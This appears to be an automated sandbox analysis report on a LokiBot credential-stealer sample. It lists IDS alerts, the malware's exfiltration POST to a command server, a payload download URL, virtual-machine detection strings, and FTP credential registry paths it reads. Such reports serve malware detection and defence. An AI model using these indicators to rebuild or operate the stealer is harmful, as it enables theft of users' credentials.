Source: o6OaOfrAQs.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: |
Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
Source: |
Binary string: mshtml.pdb source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp |
Source: |
Binary string: mshtml.pdbUGP source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_0040626D FindFirstFileA,FindClose, |
1_2_0040626D |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, |
1_2_00405732 |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_004026FE FindFirstFileA, |
1_2_004026FE |
Source: Traffic |
Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49818 -> 185.246.220.85:80 |
Source: Traffic |
Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49818 -> 185.246.220.85:80 |
Source: Traffic |
Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49818 -> 185.246.220.85:80 |
Source: Traffic |
Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49818 -> 185.246.220.85:80 |
Source: Traffic |
Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.11.20:49818 -> 185.246.220.85:80 |
Source: global traffic |
HTTP traffic detected: GET /jgEyxsZj50.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ruhsalgelisim.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /habrik/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.246.220.85Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE3769AContent-Length: 178Connection: close |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.246.220.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.246.220.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.246.220.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.246.220.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.246.220.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.246.220.85 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 9.9.9.9 |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0 |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0 |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0 |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://crl.globalsign.com/root.crl0G |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02 |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0: |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0 |
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp |
String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. |
Source: o6OaOfrAQs.exe |
String found in binary or memory: http://nsis.sf.net/NSIS_Error |
Source: o6OaOfrAQs.exe |
String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://ocsp.digicert.com0C |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://ocsp.digicert.com0O |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://ocsp.globalsign.com/rootr103 |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://ocsp2.globalsign.com/rootr306 |
Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002505000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ruhsalgelisim.com/jgEyxsZj50.ttf |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0 |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: http://www.digicert.com/CPS0 |
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp |
String found in binary or memory: http://www.gopher.ftp://ftp. |
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000626000.00000020.00000001.01000000.00000006.sdmp |
String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD |
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmp |
String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd |
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmp |
String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd |
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp |
String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 |
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000003.4849423147.0000000032400000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/ |
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com// |
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/https://login.live.com/ |
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/v104 |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: https://www.digicert.com/CPS0 |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
String found in binary or memory: https://www.globalsign.com/repository/0 |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_004051CF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, |
1_2_004051CF |
Source: o6OaOfrAQs.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, |
1_2_004031D6 |
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameAEGISIIIRadeonHelper< vs o6OaOfrAQs.exe |
Source: unknown |
Process created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe |
|
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe |
|
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 204 |
|
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, |
1_2_004031D6 |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_0040449B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, |
1_2_0040449B |
Source: |
Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr |
Source: |
Binary string: mshtml.pdb source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp |
Source: |
Binary string: mshtml.pdbUGP source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp |
Source: Yara match |
File source: Process Memory Space: o6OaOfrAQs.exe PID: 6248, type: MEMORYSTR |
Source: Yara match |
File source: 00000001.00000002.4873071383.000000000358C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_6ED72F20 push eax; ret |
1_2_6ED72F4E |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_03435F04 push es; ret |
1_2_03435F06 |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_034303E6 push 620F66DAh; iretd |
1_2_034303EB |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_03430E2F push ds; ret |
1_2_03430E38 |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_0343208F push edx; retf |
1_2_03432090 |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 4_2_01665F04 push es; ret |
4_2_01665F06 |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 4_2_016603E6 push 620F66DAh; iretd |
4_2_016603EB |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 4_2_01660E2F push ds; ret |
4_2_01660E38 |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 4_2_0166208F push edx; retf |
4_2_01662090 |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_6ED71A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, |
1_2_6ED71A9C |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Process information set: NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
File opened: C:\Program Files\qga\qga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
File opened: C:\Program Files\qga\qga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_0040626D FindFirstFileA,FindClose, |
1_2_0040626D |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, |
1_2_00405732 |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_004026FE FindFirstFileA, |
1_2_004026FE |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
API call chain: ExitProcess graph end node |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
API call chain: ExitProcess graph end node |
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Hyper-V Guest Shutdown Service |
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Hyper-V Remote Desktop Virtualization Service |
Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: vmicshutdown |
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Hyper-V Volume Shadow Copy Requestor |
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Hyper-V PowerShell Direct Service |
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Hyper-V Time Synchronization Service |
Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: vmicvss |
Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002521000.00000004.00000020.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4895164716.00000000024E4000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Hyper-V Data Exchange Service |
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Hyper-V Heartbeat Service |
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Hyper-V Guest Service Interface |
Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: vmicheartbeat |
Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002521000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW[A |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_6ED71A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, |
1_2_6ED71A9C |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_00402D63 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,SetFilePointer, |
1_2_00402D63 |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
Code function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, |
1_2_004031D6 |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts |
Jump to behavior |
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe |
File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts |
Jump to behavior |